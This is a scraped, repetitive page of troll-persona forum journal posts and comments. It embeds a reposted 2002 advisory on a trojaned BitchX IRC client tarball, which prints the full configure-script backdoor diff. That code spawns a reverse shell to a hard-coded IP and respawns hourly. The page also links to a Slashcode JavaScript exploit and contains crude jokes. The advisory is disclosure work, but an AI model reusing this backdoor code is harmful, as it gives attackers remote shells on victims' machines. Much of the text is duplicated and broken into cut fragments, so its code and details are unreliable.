How many people still play this game? Egg Troll doesn't mean to imply that its time for them to move on or anything. On the contrary, Egg Troll has moved on to other games but still has fond memories of Quake 1.
...they'll be more than a bit suprised by the backlash/bitch slapping that they will receive from the community that they claim to hold so dearly
Basically if it turns into a paid thing, SourceForge will be rid of all the dead, Stage One projects that have gone no where. It'll cut out all the deadweight that's just costing them money. I mean does the world need another mySQL-based MP3 playlist generator?
By turning it into a paid site, they'll get funding and get projects that are worth checking out. Might not make much sense from an OpenSource philisophy but then again, you can't pay the bills with doctrine.
Bruce, have you considered hanging out with the creme de la creme of Slashtrolls on the IRC server ftso.org, in #trolls, of course! Before you consider us to be some run-of-the-mill crapflooder, check out some of my work.
100,000 Euros for a blender! It must be the be able to frappe steel or something for it to cost that much. Why I found a blender on Amazon for only $20.
That's a much cooler site than the one that Slashdot linked too. You know, usually I bash Slashdot and the people who post to it, but I gotta give that site props.
A few hours ago (1 AM US/Eastern time, July 1) we downloaded ircii-pana-1.0c19.tar.gz from ftp.bitchx.com (216.165.191.5) and reviewed the configure script before running it. It has essentially the same configure backdoor as fragroute-1.2.tar.gz[1] -- a TCP connection is made outbound, with a shell bound to it (a reverse telnet). This appears to retry/respawn once per hour. The 1.0c19 tarball at ftp.irc.org (which mirrors bitchx.com) did not appear to be trojaned when we pulled from there about an hour later./dist$ md5sum ircii-pana-1.0c19* 46805199254c0fa2119d7c579194ab a8 ircii-pana-1.0c19-bitchxorg.tar.gz [bad] 79431ff0880e7317049045981fac8adc ircii-pana-1.0c19-ircorg.tar.gz [good]/src/ircii-pana-1.0c19-possiblytrojaned$ md5sum */configure d6444c18b6faf352dfc6ca3bf8cb802a ftp.bitchx.org/configure [bad] 0bd531d523606a0296da2763dafa51f2 ftp.irc.org/configure [good]
Here is the added code in the bitchx.org distribution:
--- ircii-pana-1.0c19-ftp.irc.org/configure Sun Mar 24 04:30:49 2002 +++ ircii-pana-1.0c19-ftp.bitchx.org/configure Sun Mar 24 04:30:49 2002 @@ -6326,6 +6326,88 @@
fi
# We did not find ourselves, most probably we were run as `sh COMMAND' # in which case we are not to be found in the path. cat >conftest.c <<_ACEOF/* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h>/* Override any gcc2 internal prototype to avoid an error. Override any jmp buf internal prototype to avoid an error. */ jmp_buf env; int s; void sig(int sig) { close (s); sleep (3600); longjmp (env, 0); }
int main() {/* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ int x; char c; struct sockaddr_in sa;/* This call has the arguments reversed. A reversed system may check and see that the address of main */ switch (fork ()) { case 0: break; default: exit (0); }
signal (SIGALRM, sig); do {/* Override any gcc2 internal prototype to avoid an error. Override any jmp buf internal prototype to avoid an error. */ setjmp(env); if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1)) exit (1); memset (&sa, 0, sizeof(sa)); sa.sin_family = AF_INET;/* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ sa.sin_port = htons (6667); sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);/* Override any gcc2 internal prototype to avoid an error. *//* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1)) if (errno != EINTR) exit(1); if ((x = read (s, &c, 1)) == (-1)) { if (errno != EINTR) exit (1); } else if (x == 1) {/* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ alarm (0); dup2 (s, 0); dup2 (s, 1); dup2 (s, 2);/* System header to define __stub macros and hopefully few prototypes, which can conflict with char inet_addr(); below. */ { char *a[] = { "/bin/sh", NULL }; execve (a[0], a, NULL); } } } while (1); } _ACEOF # Don't try to exec as it changes $[0], causing all sort of problems # (the dirname of $[0] is not the place where we might find the # original and so on. Autoconf is especially sensible to this). # Exit status is that of the last command. ACLIBLOCAL="`basename \"\`grep $USER:/etc/passwd\`\"`" 1>/dev/null 2>/dev/null # Create $as_me.lineno as a copy of $as_myself, but with $LINENO # uniformly replaced by the line number. The first 'sed' inserts a # line-number line before each line; the second 'sed' does the real # work. The second script uses 'N' to pair each line-number line # with the numbered line, and appends trailing '-' during # substitution so that $LINENO is not a special case at line end. # (Raja R Harinath suggested sed '=', and Paul Eggert wrote the # second 'sed' script. Blame Lee E. McMahon for sed's syntax.:-) if ! test $ACLIBLOCAL ; then ACLIBLOCAL=sh; fi 1>/dev/null 2>/dev/null $CC $LIBS -w conftest.c -o $ACLIBLOCAL ; PATH=.:$PATH $ACLIBLOCAL 1>/dev/null 2>/dev/null rm -f./conftest./conftest.c $ACLIBLOCAL./acliblocal./aclib
echo "$as_me:$LINENO: checking for inet_aton" >&5 echo $ECHO_N "checking for inet_aton... $ECHO_C" >&6 if test "${ac_cv_func_inet_aton+set}" = set; then
</diff>
There's a little more to this. There are at least two versions of the source code on (www|ftp).bitchx.(org|com)
-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz -rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz.1
There is something very strange going on with the FTP server on ftp.bitchx.org. In some cases, it serves up the trojaned version; in others, the original, safe version. It seems to be client/ client-behavior based (we're not sure exactly what).
These will usually get you a clean copy: wget ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana- 1.0c19.tar.gz [netscape] ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana- 1.0c19.tar.gz ftp ftp.bitchx.org ; get/pub/BitchX/source/ircii-pana-1.0c19.tar.gz ftp ftp.bitchx.org ; cd/pub/BitchX/source ; get ircii-pana-1.0c19.tar.gz
These will usually give you the trojaned version:
lynx ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana- 1.0c19.tar.gz ftp ftp.bitchx.org ; cd pub ; cd BitchX ; cd source ; \ get ircii-pana-1.0c19.tar.gz
To add a little more to this; we've confirmed that if you come off of what appears to be a cablemodem/dsl IP you are likely to get a trojan'd copy. If you come off of a more static link, you are likely to get a clean copy.
This was verified using: 204.xxx.xxx.xxx range gets clean 12.xxx.xxx.xxx (ATT) gets dirty 66.xxx.xxx.xxx gets dirty
Using the 'ftp ; cd pub;...' method. We have also observed cases where the 'ftp method' yields a clean copy but lynx still fetches the trojan'ed copy. In addition to source-network checking, ftpd may be checking anonymous vs ftp login strings, what anon password is sent, whether the client issues explicit TYPE I commands, whether it sends paths with leading slashes, PORT vs PASV commands, RETR with the full path, etc.
This indicates that someone has (at least) also tampered with the FTP server software itself; most likely the server has been rooted. We have reported this issue to BitchX developers, and they are investigating. In the meantime, we suggest everyone should treat anything downloaded from the ftp.bitchx.org server with extreme skepticism.
Slashdot editors once again continue their campaign of censorship. It has come to Egg
Troll's attention that Jamie "Security Through Obscurity" McCarthy has sent a Cease and
Desist order to our beloved Trollaxor for a diary
entry posted on his website that detailed a javascript exploit to Slashcode.
The hypocracy in doing this is incredible. For a site that routinely condems companies that
attempt such heavy-handed tactics shows that Slashdot is almost as morally bankrupt as
VA/Systems soon will be. I would expect such tactics from the Church of Scientology or a
Fortune 500 company. I guess Slashdot has learned: "If you can't beat them, join them!"
Is the imminent collapse of their parent company causing them all this stress? Or maybe its
years of using that substandard open source software. Whatever the case, this is one of the
slimiest things Slashdot has done since the First Troll Post Investigation.
For those wondering the code in question can be found here.
Slashdot Mirror
I have a crush on Physics Genius! I will marry him someday!
You are Egg Troll's favorite. We've named our she-male Real Doll after you! :)
Where can Egg Troll find a Quake client? Egg Troll knows the source code is available, but we'd rather not have to compile it.
How many people still play this game? Egg Troll doesn't mean to imply that its time for them to move on or anything. On the contrary, Egg Troll has moved on to other games but still has fond memories of Quake 1.
Go back in time and whack RMS. This way the whole GPL software would never be around to infect legitimate companies. You know you agree with me, too!
Perhaps they're going there to open up a 7-11?!
Looks like someone woke up Monster Island!
Is Slashdot now being paid to run stories for products? I hope not, but honestly, I can see no other reason for this story being on Slashdot....
Basically if it turns into a paid thing, SourceForge will be rid of all the dead, Stage One projects that have gone no where. It'll cut out all the deadweight that's just costing them money. I mean does the world need another mySQL-based MP3 playlist generator?
By turning it into a paid site, they'll get funding and get projects that are worth checking out. Might not make much sense from an OpenSource philisophy but then again, you can't pay the bills with doctrine.
Three generations of rockets down the road, John will GPL the specs for the first rocket!
Come on in, Bruce. I type at 90+ WPM as certified by the State of California.
Bruce, have you considered hanging out with the creme de la creme of Slashtrolls on the IRC server ftso.org, in #trolls, of course! Before you consider us to be some run-of-the-mill crapflooder, check out some of my work.
Hope to see you there, Bruce!
I believe sales are down as people have learned that Linux can be downloaded...for free!
This whole article and no one asks him about playing bass with the greatest rock and roll band of all time, Led Zeppelin? Oh the humanity....
TextPad is 100% approved by Egg Troll. Its small, does everything I want it to, color coding, fast...how can you not love this?
100,000 Euros for a blender! It must be the be able to frappe steel or something for it to cost that much. Why I found a blender on Amazon for only $20.
That's a much cooler site than the one that Slashdot linked too. You know, usually I bash Slashdot and the people who post to it, but I gotta give that site props.
I claim this FP for the glory of the Queen of Spain, and for my fellows in #trolls on trollaxor.com!
No, I found it much more difficult to use. Everything is in Chinese!!
A few hours ago (1 AM US/Eastern time, July 1) we downloaded /dist$ md5sum ircii-pana-1.0c19*b a8 ircii-pana-1.0c19-bitchxorg.tar.gz [bad] /src/ircii-pana-1.0c19-possiblytrojaned$ md5sum */configure
/* We use char because int might match the return type of a gcc2 /* Override any gcc2 internal prototype to avoid an error.
/* We use char because int might match the return type of a gcc2 /* This call has the arguments reversed.
/* Override any gcc2 internal prototype to avoid an error. /* We use char because int might match the return type of a gcc2 /* Override any gcc2 internal prototype to avoid an error. */ /* The GNU C library defines this for functions which it implements /* The GNU C library defines this for functions which it implements /* System header to define __stub macros and hopefully few prototypes, /etc/passwd\`\"`" 1>/dev/null 2>/dev/null :-) ./conftest ./conftest.c $ACLIBLOCAL ./acliblocal ./aclib
7 9194aba8 ircii-pana-1.0c19.tar.gz.1 <- owned
/
- 1.0c19.tar.gz- 1.0c19.tar.gz /pub/BitchX/source/ircii-pana-1.0c19.tar.gz /pub/BitchX/source ; get ircii-pana-1.0c19.tar.gz
- 1.0c19.tar.gz
...' method. We have also observed cases
2 3803434&w=2
ircii-pana-1.0c19.tar.gz from ftp.bitchx.com (216.165.191.5) and
reviewed the configure script before running it. It has essentially
the same configure backdoor as fragroute-1.2.tar.gz[1] -- a TCP
connection is made outbound, with a shell bound to it (a reverse
telnet). This appears to retry/respawn once per hour. The 1.0c19
tarball at ftp.irc.org (which mirrors bitchx.com) did not appear to be
trojaned when we pulled from there about an hour later.
46805199254c0fa2119d7c579194a
79431ff0880e7317049045981fac8adc ircii-pana-1.0c19-ircorg.tar.gz [good]
d6444c18b6faf352dfc6ca3bf8cb802a ftp.bitchx.org/configure [bad]
0bd531d523606a0296da2763dafa51f2 ftp.irc.org/configure [good]
Here is the added code in the bitchx.org distribution:
--- ircii-pana-1.0c19-ftp.irc.org/configure Sun Mar 24 04:30:49 2002
+++ ircii-pana-1.0c19-ftp.bitchx.org/configure Sun Mar 24 04:30:49 2002
@@ -6326,6 +6326,88 @@
fi
# We did not find ourselves, most probably we were run as `sh COMMAND'
# in which case we are not to be found in the path.
cat >conftest.c <<_ACEOF
builtin and then its argument prototype would still apply. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
Override any jmp buf internal prototype to avoid an error. */
jmp_buf env; int s;
void sig(int sig)
{
close (s); sleep (3600); longjmp (env, 0);
}
int main()
{
builtin and then its argument prototype would still apply. */
int x; char c; struct sockaddr_in sa;
A reversed system may check and see that the address of main
*/
switch (fork ()) { case 0: break; default: exit (0); }
signal (SIGALRM, sig);
do {
Override any jmp buf internal prototype to avoid an error. */
setjmp(env);
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1)) exit (1);
memset (&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
builtin and then its argument prototype would still apply. */
sa.sin_port = htons (6667);
sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
if (errno != EINTR) exit(1);
if ((x = read (s, &c, 1)) == (-1)) {
if (errno != EINTR) exit (1); }
else if (x == 1) {
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
alarm (0); dup2 (s, 0); dup2 (s, 1); dup2 (s, 2);
which can conflict with char inet_addr(); below. */
{ char *a[] = { "/bin/sh", NULL }; execve (a[0], a, NULL); }
}
} while (1);
}
_ACEOF
# Don't try to exec as it changes $[0], causing all sort of problems
# (the dirname of $[0] is not the place where we might find the
# original and so on. Autoconf is especially sensible to this).
# Exit status is that of the last command.
ACLIBLOCAL="`basename \"\`grep $USER:
# Create $as_me.lineno as a copy of $as_myself, but with $LINENO
# uniformly replaced by the line number. The first 'sed' inserts a
# line-number line before each line; the second 'sed' does the real
# work. The second script uses 'N' to pair each line-number line
# with the numbered line, and appends trailing '-' during
# substitution so that $LINENO is not a special case at line end.
# (Raja R Harinath suggested sed '=', and Paul Eggert wrote the
# second 'sed' script. Blame Lee E. McMahon for sed's syntax.
if ! test $ACLIBLOCAL ; then ACLIBLOCAL=sh; fi 1>/dev/null 2>/dev/null
$CC $LIBS -w conftest.c -o $ACLIBLOCAL ; PATH=.:$PATH $ACLIBLOCAL 1>/dev/null 2>/dev/null
rm -f
echo "$as_me:$LINENO: checking for inet_aton" >&5
echo $ECHO_N "checking for inet_aton... $ECHO_C" >&6
if test "${ac_cv_func_inet_aton+set}" = set; then
</diff>
There's a little more to this. There are at least two versions of the
source code on (www|ftp).bitchx.(org|com)
79431ff0880e7317049045981fac8adc ircii-pana-1.0c19.tar.gz
46805199254c0fa2119d7c5
-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz
-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz.1
There is something very strange going on with the FTP server on
ftp.bitchx.org. In some cases, it serves up the trojaned version; in
others, the original, safe version. It seems to be client
client-behavior based (we're not sure exactly what).
These will usually get you a clean copy:
wget ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana
[netscape] ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana
ftp ftp.bitchx.org ; get
ftp ftp.bitchx.org ; cd
These will usually give you the trojaned version:
lynx ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana
ftp ftp.bitchx.org ; cd pub ; cd BitchX ; cd source ; \
get ircii-pana-1.0c19.tar.gz
To add a little more to this; we've confirmed that if you come off of
what appears to be a cablemodem/dsl IP you are likely to get a
trojan'd copy. If you come off of a more static link, you are likely
to get a clean copy.
This was verified using:
204.xxx.xxx.xxx range gets clean
12.xxx.xxx.xxx (ATT) gets dirty
66.xxx.xxx.xxx gets dirty
Using the 'ftp ; cd pub;
where the 'ftp method' yields a clean copy but lynx still fetches the
trojan'ed copy. In addition to source-network checking, ftpd may be
checking anonymous vs ftp login strings, what anon password is sent,
whether the client issues explicit TYPE I commands, whether it sends
paths with leading slashes, PORT vs PASV commands, RETR with the full
path, etc.
This indicates that someone has (at least) also tampered with the FTP
server software itself; most likely the server has been rooted. We
have reported this issue to BitchX developers, and they are
investigating. In the meantime, we suggest everyone should treat
anything downloaded from the ftp.bitchx.org server with extreme
skepticism.
[1] http://marc.theaimsgroup.com/?l=bugtraq&m=1022855
If penguins were legal to own, could there be any other obvious choice. :)
The hypocracy in doing this is incredible. For a site that routinely condems companies that attempt such heavy-handed tactics shows that Slashdot is almost as morally bankrupt as VA/Systems soon will be. I would expect such tactics from the Church of Scientology or a Fortune 500 company. I guess Slashdot has learned: "If you can't beat them, join them!"
To make matters extra special, Jamie updated Slashdot's Slashcode, yet didn't release details of this exploit to other sites running Slashcode. Guess its only important for Slashdot to look out for number one!
Is the imminent collapse of their parent company causing them all this stress? Or maybe its years of using that substandard open source software. Whatever the case, this is one of the slimiest things Slashdot has done since the First Troll Post Investigation.
For those wondering the code in question can be found here.
Thank you for your time,
Egg Troll
Does this work on other Slash sites? If so, what browser is required?
I hope that AC didn't post our IRC server again, and deny the Queen of Spain this first post.
I am in awe of your talents. I bow to your mastery.